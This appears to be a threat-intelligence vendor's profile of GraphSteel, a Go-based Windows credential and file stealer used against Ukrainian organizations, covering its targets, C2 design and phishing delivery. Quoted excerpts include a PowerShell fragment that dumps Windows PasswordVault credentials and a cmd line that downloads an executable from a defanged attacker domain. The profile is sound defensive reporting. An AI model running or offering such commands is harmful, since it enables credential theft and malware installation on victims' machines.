GraphSteel is a Go-based information stealer for Windows that serves as the client component of the Elephant malware framework. Also described as a backdoor, it supports credential theft, host reconnaissance, command execution, and file exfiltration. It is associated with UAC-0056, also tracked as Ember Bear, SaintBear, UNC2589, and TA471, and has been deployed in cyberespionage campaigns against Ukrainian government organizations and other Ukrainian entities, including media organizations.
GraphSteel collects host information such as the hostname, username, and IP address. Its credential collection targets browsers, Wi-Fi profiles, Windows credential stores and password vaults, mail accounts, and applications including PuTTY and FileZilla. It incorporates credential-recovery code from goLazagne and searches user folders and drives for documents, archives, certificates, key files, and configuration data. File hashes are used to identify newly collected files for upload. Command-and-control and exfiltration use GraphQL over WebSockets, with AES-encrypted messages and Base64 encoding.
Observed delivery chains use spear-phishing emails containing macro-enabled Excel attachments or links to fake antivirus and security updates. Other deployments disguise the initial executable as translation software. Multistage dropper and downloader components retrieve GraphSteel, commonly alongside the GrimPlant backdoor, and establish persistence through Windows autorun configuration. GraphSteel provides the framework's credential and document collection functionality, while GrimPlant supplies complementary remote-control capabilities.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
GraphSteel exfiltrates information about the infected system, files from various folders and drives, and credentials from various sources.
The last payload that the researchers detailed is named elephant_client by the actor. It is also tracked as the GraphSteel backdoor. This final payload is a data stealer, the researchers say.
28 distinct techniques documented for this family, organized by ATT&CK tactic.
The emails were themed as “critical security updates” and contained links to download a fake AV update package.
The phishing emails impersonate Ukrainian government agencies offering ways to increase network security and advise recipients to download "critical security updates," which come in the form of a 60 MB file named "BitdefenderWindowsUpdatePackage.exe."
The capabilities of the two tools cover network reconnaissance, command execution, and file operations... Execute commands... Execute commands received remotely and return results to C2
powershell /Q /C -encodedCommand ... [Windows.Security.Credentials.PasswordVault ... RetrieveAll() ... Select UserName, Resource, Password
C:\Windows\System32\cmd.exe /C cd %USERPROFILE%\AppData\Local\Temp\ & curl -O hxxps://forkscenter[.]fr/Sdghrt_umrj6/wisw.exe
EXE-файли (завантажувачі з Discord) захищено протектором Themida ... завантаження, base64-декодування
gets the IP address of the machine by making a request to https://api.ipify.org/
GraphSteel features: Gather hostname, username, and IP address information... GrimPlant capabilities: Gather IP address, hostname, OS, username, home dir
The capabilities of the two tools cover network reconnaissance
the malware collects the hostname, OS name and number of CPUs in the system
Use WebSocket and GraphQL to communicate with C2 using AES and base64 encryption
Use WebSocket and GraphQL to communicate with C2 using AES and base64 encryption... Use gRPC (HTTP/2+SSL) for C2 communication
GraphSteel ... Для комунікації з сервером управління використовується WebSocket та GraphQL
38 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
8 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Final-stage backdoor and stealer that decrypts the C2 address, connects to the server, collects host and user data, and steals credentials from browsers, Wi-Fi profiles, Credential Manager, mail accounts, PuTTY, and FileZilla.
Go-based Elephant Framework implant that steals system information, documents, Wi-Fi passwords, browser credentials, password-vault credentials, certificates, and SSH-session information. It uses GraphQL and WebSockets for exfiltration, with AES-encrypted communications over port 443. Although some passages call it a backdoor, its described function is information theft.
Go-based credential and file stealer component of Elephant. Steals credentials using goLazagne-derived code and searches common user folders for sensitive file types (e.g., .key, .crt, .ssh, .ovpn, Office docs, archives) for exfiltration. Communicates to a GraphQL endpoint over WebSockets; messages encrypted with AES; receives session key via a custom RSA-based exchange.
A named malware tool associated with UAC-0056 in attacks on Ukrainian infrastructure.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.